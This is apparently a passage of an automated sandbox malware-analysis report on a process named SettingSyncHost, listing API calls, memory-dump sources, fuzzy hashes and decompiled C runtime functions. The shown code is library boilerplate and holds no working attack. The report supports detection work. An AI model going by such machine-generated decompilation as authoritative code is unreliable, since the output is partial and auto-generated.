                                                                                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,>=,003EB118,?,00000000,?,?,?,?,?,?,003DE33E), ref: 003EB323
                                                                                                                                      • GetCPInfo.KERNEL32(00000000,003EB118,?,>=,003EB118,?,00000000,?,?,?,?,?,?,003DE33E,?), ref: 003EB365
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CodeInfoPageValid
                                                                                                                                      • String ID: >=
                                                                                                                                      • API String ID: 546120528-2435745117
                                                                                                                                      • Opcode ID: 5b2d0288226af5e0bd8e56222f5df19a4edc60e3be50f7508f22cad35c5b869d
                                                                                                                                      • Instruction ID: 24c86bbb247957fbf5be9e3ae7f22ea8f1136377f0d118081031d020667c7c40
                                                                                                                                      • Opcode Fuzzy Hash: 5b2d0288226af5e0bd8e56222f5df19a4edc60e3be50f7508f22cad35c5b869d
                                                                                                                                      • Instruction Fuzzy Hash: 0E513674A006A58EDB238F77C4426BBFBE5EF40300F15826ED0968B2D2D7749945CF91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E116E, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: C:\Users\Public\SettingSyncHost
                                                                                                                                      • API String ID: 0-2131873982
                                                                                                                                      • Opcode ID: f053e867502c063b695edc65e4143caa9da926f0ea4866862a579d2538006324
                                                                                                                                      • Instruction ID: 288ba20b9359c92577d402018891750dc95ea42acaf8081482a15d7b82d91bf1
                                                                                                                                      • Opcode Fuzzy Hash: f053e867502c063b695edc65e4143caa9da926f0ea4866862a579d2538006324
                                                                                                                                      • Instruction Fuzzy Hash: 4B41B671E002A4AFDB13DB9ACC859AEBBFCEF85310F100666E504EB290D7B08E40DB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003DB430, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 003DB46F
                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 003DB523
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                      • String ID: csm
                                                                                                                                      • API String ID: 3480331319-1018135373
                                                                                                                                      • Opcode ID: 812eeb37ba5a4e1d87f7957e5424a29e800f501f0ce9c42a3e53c16ca6bc65bc
                                                                                                                                      • Instruction ID: 83cc322f12e587207c2e09e16ffa9e3592ec4245e9cc1a5c873f4334b1605d6c
                                                                                                                                      • Opcode Fuzzy Hash: 812eeb37ba5a4e1d87f7957e5424a29e800f501f0ce9c42a3e53c16ca6bc65bc
                                                                                                                                      • Instruction Fuzzy Hash: B1419835A0020CDFCF12DF69E845AAEBBB6EF45314F168157E8146B392D731DA11CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E17DD, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free
                                                                                                                                      • String ID: 1Pz?
                                                                                                                                      • API String ID: 269201875-1725551145
                                                                                                                                      • Opcode ID: d476719d7e99d97090a14ee3127f63fd41905c115a3b1cb96924f8dba00c0e8e
                                                                                                                                      • Instruction ID: 46d8f45f4226c562aac0f0a2992a42f6a0a74c692a5e3bfff1028f1346e3b993
                                                                                                                                      • Opcode Fuzzy Hash: d476719d7e99d97090a14ee3127f63fd41905c115a3b1cb96924f8dba00c0e8e
                                                                                                                                      • Instruction Fuzzy Hash: DF41A336E002649FCB15DF69C891A5EB3A6EF88714B16467CE515EF381D731ED02CB80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003DD45B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 003DD480
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EncodePointer
                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                      • Opcode ID: 2aaa9cab27bd1499ddf737264baff4b9b508d877f440f7de8bfb8c6aa0bc710f
                                                                                                                                      • Instruction ID: 4e0dc5f448f7f770ec03356901c43236f58602eb51ac700af1513079cbef8efc
                                                                                                                                      • Opcode Fuzzy Hash: 2aaa9cab27bd1499ddf737264baff4b9b508d877f440f7de8bfb8c6aa0bc710f
                                                                                                                                      • Instruction Fuzzy Hash: BE418B72900209AFCF16CF98ED81AEEBBB6FF49304F15815AF9046B261D335AA50DB51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EB0B6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003EAE60: GetOEMCP.KERNEL32(00000000,003EB0D1,?,?,>=,003DE33E,?,?,?), ref: 003EAE8B
                                                                                                                                      • _free.LIBCMT ref: 003EB12E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free
                                                                                                                                      • String ID: >=
                                                                                                                                      • API String ID: 269201875-2435745117
                                                                                                                                      • Opcode ID: 9af3c8f805d412b54a2cf9c877f69ff4816e8c4172a4be77f0a7994d0f7b1b61
                                                                                                                                      • Instruction ID: bee7311465e06fb7df80d1ea48772b23f75f425273c4e04a795b1ed032182c0f
                                                                                                                                      • Opcode Fuzzy Hash: 9af3c8f805d412b54a2cf9c877f69ff4816e8c4172a4be77f0a7994d0f7b1b61
                                                                                                                                      • Instruction Fuzzy Hash: 8031A3719002999FCB03DF59D891A9BB7B4EF44324F11466AF911AB2D1EB319D10CB60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00393FEE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                      			E00393FEE(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v48;
				intOrPtr* _v52;
				void* _t50;
				intOrPtr* _t52;
				void* _t55;
				LONG* _t59;
				LONG* _t60;
				void* _t66;
				intOrPtr* _t67;
				LONG* _t70;
				LONG* _t71;
				intOrPtr* _t77;
				intOrPtr* _t78;
				void* _t90;
				void* _t91;
				void* _t97;
				char* _t101;
				intOrPtr _t105;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;

				_t90 = __ecx;
				_t1 =  &_a12; // 0x394331
				_t105 =  *_t1;
				_t50 = E0039AADA(_a4, _a8, _t105);
				_t110 = _t109 + 0xc;
				if(_t50 != 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E003991DF();
					asm("int3");
					_t111 = _t110 - 0x10;
					_push(0);
					_v48 = 1;
					_t52 = E0039A7BA(0x355);
					_pop(_t91);
					_v52 = _t52;
					if(_t52 != 0) {
						_t12 = _t52 + 4; // 0x4
						_t101 = _t12;
						 *_t101 = 0;
						 *_t52 = 1;
						_push( *((intOrPtr*)(_t105 + 0x58)));
						_push(0x3bbd80);
						_push( *0x3bbcb4);
						E00393E8E(_t91, _t101, 0x351, 3);
						_t14 = _t105 + 0x58; // 0x58
						_t112 = _t111 + 0x18;
						_v12 = 0x3bbcb4;
						_v16 = _t14;
						while(1) {
							_t55 = E0039A8EB(_t101, 0x351, 0x3bbd7c);
							_t113 = _t112 + 0xc;
							if(_t55 != 0) {
								break;
							}
							_t18 = _v16 + 0x10; // 0x10
							_v16 = _t18;
							_t66 = E0039AB40( *_v16,  *_t18);
							_pop(_t97);
							if(_t66 != 0) {
								_v20 = _v20 & 0x00000000;
							}
							_t67 = _v16;
							_push( *_t67);
							_v12 = _v12 + 0xc;
							_push(0x3bbd80);
							_v16 = _t67;
							_push( *_v12);
							E00393E8E(_t97, _t101, 0x351, 3);
							_t112 = _t113 + 0x18;
							if(_v12 < 0x3bbce4) {
								continue;
							} else {
								if(_v20 != 0) {
									L22:
									E00399DFA(_v24);
									_t59 =  *(_t105 + 0x50);
									if(_t59 != 0 && InterlockedDecrement(_t59) == 0) {
										E00399DFA( *(_t105 + 0x50));
									}
									_t60 =  *(_t105 + 0x54);
									if(_t60 != 0 && InterlockedDecrement(_t60) == 0) {
										E00399DFA( *(_t105 + 0x54));
									}
									_t52 =  *((intOrPtr*)(_t105 + 0x68));
									 *(_t105 + 0x54) = 0;
									 *(_t105 + 0x4c) = 0;
									 *(_t105 + 0x50) = 0;
									 *((intOrPtr*)(_t105 + 0x48)) = 0;
								} else {
									_t70 =  *(_t105 + 0x50);
									if(_t70 != 0 && InterlockedDecrement(_t70) == 0) {
										E00399DFA( *(_t105 + 0x50));
									}
									_t71 =  *(_t105 + 0x54);
									if(_t71 != 0 && InterlockedDecrement(_t71) == 0) {
										E00399DFA( *(_t105 + 0x54));
									}
									_t33 =  &_v24; // 0x394926
									 *(_t105 + 0x54) =  *(_t105 + 0x54) & 0x00000000;
									 *(_t105 + 0x4c) =  *(_t105 + 0x4c) & 0x00000000;
									 *(_t105 + 0x50) =  *_t33;
									 *((intOrPtr*)(_t105 + 0x48)) = _t101;
									_t52 = _t101;
								}
							}
							goto L30;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E003991DF();
						goto L22;
					}
					L30:
					return _t52;
				} else {
					_t77 = _t105 + 0x40;
					if( *_t77 != 0) {
						_push(_t77);
						_push(0x3bbd78);
						E00393E8E(_t90, _a4, _a8, 2);
						_t110 = _t110 + 0x14;
					}
					_t78 = _t105 + 0x80;
					if( *_t78 != 0) {
						_push(_t78);
						_push(0x3bbd74);
						return E00393E8E(_t90, _a4, _a8, 2);
					}
					return _t78;
				}
			}






























                                                                                                                                      0x00393fee
                                                                                                                                      0x00393ff5
                                                                                                                                      0x00393ff5
                                                                                                                                      0x00393fff
                                                                                                                                      0x00394004
                                                                                                                                      0x0039400b
                                                                                                                                      0x0039404e
                                                                                                                                      0x0039404f
                                                                                                                                      0x00394050
                                                                                                                                      0x00394051
                                                                                                                                      0x00394052
                                                                                                                                      0x00394053
                                                                                                                                      0x00394058
                                                                                                                                      0x0039405e
                                                                                                                                      0x00394061
                                                                                                                                      0x0039406a
                                                                                                                                      0x0039406d
                                                                                                                                      0x00394072
                                                                                                                                      0x00394073
                                                                                                                                      0x00394078
                                                                                                                                      0x0039407f
                                                                                                                                      0x0039407f
                                                                                                                                      0x00394082
                                                                                                                                      0x00394085
                                                                                                                                      0x00394087
                                                                                                                                      0x0039408f
                                                                                                                                      0x00394094
                                                                                                                                      0x0039409e
                                                                                                                                      0x003940a3
                                                                                                                                      0x003940a6
                                                                                                                                      0x003940a9
                                                                                                                                      0x003940b0
                                                                                                                                      0x003940b3
                                                                                                                                      0x003940ba
                                                                                                                                      0x003940bf
                                                                                                                                      0x003940c4
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003940cd
                                                                                                                                      0x003940d2
                                                                                                                                      0x003940d7
                                                                                                                                      0x003940dd
                                                                                                                                      0x003940e0
                                                                                                                                      0x003940e2
                                                                                                                                      0x003940e2
                                                                                                                                      0x003940e6
                                                                                                                                      0x003940e9
                                                                                                                                      0x003940eb
                                                                                                                                      0x003940ef
                                                                                                                                      0x003940f4
                                                                                                                                      0x003940fa
                                                                                                                                      0x00394100
                                                                                                                                      0x00394105
                                                                                                                                      0x0039410f
                                                                                                                                      0x00000000
                                                                                                                                      0x00394111
                                                                                                                                      0x00394115
                                                                                                                                      0x0039416c
                                                                                                                                      0x0039416f
                                                                                                                                      0x00394174
                                                                                                                                      0x00394182
                                                                                                                                      0x0039418e
                                                                                                                                      0x00394193
                                                                                                                                      0x00394194
                                                                                                                                      0x00394199
                                                                                                                                      0x003941a5
                                                                                                                                      0x003941aa
                                                                                                                                      0x003941ab
                                                                                                                                      0x003941ae
                                                                                                                                      0x003941b1
                                                                                                                                      0x003941b4
                                                                                                                                      0x003941b7
                                                                                                                                      0x00394117
                                                                                                                                      0x00394117
                                                                                                                                      0x00394122
                                                                                                                                      0x0039412e
                                                                                                                                      0x00394133
                                                                                                                                      0x00394134
                                                                                                                                      0x00394139
                                                                                                                                      0x00394145
                                                                                                                                      0x0039414a
                                                                                                                                      0x0039414b
                                                                                                                                      0x0039414e
                                                                                                                                      0x00394152
                                                                                                                                      0x00394156
                                                                                                                                      0x00394159
                                                                                                                                      0x0039415c
                                                                                                                                      0x0039415c
                                                                                                                                      0x00394115
                                                                                                                                      0x00000000
                                                                                                                                      0x003941ba
                                                                                                                                      0x00394162
                                                                                                                                      0x00394163
                                                                                                                                      0x00394164
                                                                                                                                      0x00394165
                                                                                                                                      0x00394166
                                                                                                                                      0x00394167
                                                                                                                                      0x00000000
                                                                                                                                      0x00394167
                                                                                                                                      0x003941bb
                                                                                                                                      0x003941bd
                                                                                                                                      0x0039400d
                                                                                                                                      0x0039400d
                                                                                                                                      0x00394012
                                                                                                                                      0x00394014
                                                                                                                                      0x00394015
                                                                                                                                      0x00394022
                                                                                                                                      0x00394027
                                                                                                                                      0x00394027
                                                                                                                                      0x0039402a
                                                                                                                                      0x00394034
                                                                                                                                      0x00394036
                                                                                                                                      0x00394037
                                                                                                                                      0x00000000
                                                                                                                                      0x00394049
                                                                                                                                      0x0039404d
                                                                                                                                      0x0039404d

                                                                                                                                      APIs
                                                                                                                                      • _strcpy_s.LIBCMT ref: 00393FFF
                                                                                                                                      • __invoke_watson.LIBCMT ref: 00394053
                                                                                                                                        • Part of subcall function 00393E8E: _strcat_s.LIBCMT ref: 00393EAD
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __invoke_watson_strcat_s_strcpy_s
                                                                                                                                      • String ID: 1C9
                                                                                                                                      • API String ID: 312943863-1589232251
                                                                                                                                      • Opcode ID: 9ff09fb65ec0d6daa5bdab40dc5fc387890bb6f86cb399b08f1c7247d4f326ee
                                                                                                                                      • Instruction ID: 8f5c342fcc1f93eb8541919a56cd38d5d9eef461935e2b9cba6a05b848f766f3
                                                                                                                                      • Opcode Fuzzy Hash: 9ff09fb65ec0d6daa5bdab40dc5fc387890bb6f86cb399b08f1c7247d4f326ee
                                                                                                                                      • Instruction Fuzzy Hash: 21F06DB2940248BBDF236FA5CC02DDA7F5DEF00354F458065FA195A152E7729E14D790
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D9620, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003D962B
                                                                                                                                      • ___raise_securityfailure.LIBCMT ref: 003D96E8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                      • String ID: V->
                                                                                                                                      • API String ID: 3761405300-1983630420
                                                                                                                                      • Opcode ID: 69d6ad99628383b9fecd5cbea45e732fc56e767b3adad6963466323d85d55133
                                                                                                                                      • Instruction ID: ba8792fc1c67e6b9f032db74bf30a94b40942c24648c5d90a5a5360a4f6da17b
                                                                                                                                      • Opcode Fuzzy Hash: 69d6ad99628383b9fecd5cbea45e732fc56e767b3adad6963466323d85d55133
                                                                                                                                      • Instruction Fuzzy Hash: 5C1190B4A91208DBE755DF25EA816907BF4BF58310F00903AE908AB772E7749D81CB4D
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EAE60, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetOEMCP.KERNEL32(00000000,003EB0D1,?,?,>=,003DE33E,?,?,?), ref: 003EAE8B
                                                                                                                                      • GetACP.KERNEL32(00000000,003EB0D1,?,?,>=,003DE33E,?,?,?), ref: 003EAEA2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: >=
                                                                                                                                      • API String ID: 0-2435745117
                                                                                                                                      • Opcode ID: 45cf99eb442e707056977dfe81bf68ea7f34851a67f3d242d51eee0c23be031e
                                                                                                                                      • Instruction ID: 91d1f1caf322830193e9aff35ae9cf80db77450cb47cd0e231f7a5c6254e763d
                                                                                                                                      • Opcode Fuzzy Hash: 45cf99eb442e707056977dfe81bf68ea7f34851a67f3d242d51eee0c23be031e
                                                                                                                                      • Instruction Fuzzy Hash: E9F06D709017948FDB1ADB69D98C77C77F4BB80339F254B58E025AA2E1DBB1A940CB43
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0039E178, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0039E178(char _a4, intOrPtr _a8) {
				struct _CRITICAL_SECTION* _t8;
				intOrPtr _t11;
				void* _t12;
				void* _t14;

				_t1 =  &_a4; // 0x392f46
				_t6 =  *_t1;
				if( *_t1 >= 0x14) {
					_t8 = _a8 + 0x20;
					EnterCriticalSection(_t8);
					return _t8;
				} else {
					E00399DC7(_t12, _t14, _t6 + 0x10);
					_t11 = _a8;
					 *(_t11 + 0xc) =  *(_t11 + 0xc) | 0x00008000;
					return _t11;
				}
			}







                                                                                                                                      0x0039e17d
                                                                                                                                      0x0039e17d
                                                                                                                                      0x0039e183
                                                                                                                                      0x0039e19e
                                                                                                                                      0x0039e1a2
                                                                                                                                      0x0039e1a9
                                                                                                                                      0x0039e185
                                                                                                                                      0x0039e189
                                                                                                                                      0x0039e18e
                                                                                                                                      0x0039e191
                                                                                                                                      0x0039e19a
                                                                                                                                      0x0039e19a

                                                                                                                                      APIs
                                                                                                                                      • __lock.LIBCMT ref: 0039E189
                                                                                                                                        • Part of subcall function 00399DC7: __mtinitlocknum.LIBCMT ref: 00399DDD
                                                                                                                                        • Part of subcall function 00399DC7: __amsg_exit.LIBCMT ref: 00399DE9
                                                                                                                                        • Part of subcall function 00399DC7: EnterCriticalSection.KERNEL32(00000001,00000001,?,003997EE,0000000D), ref: 00399DF1
                                                                                                                                      • EnterCriticalSection.KERNEL32(-00000014,?,00394BEA,00000001,00000000,003C5DB8,0000000C,00392F46,00000000), ref: 0039E1A2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
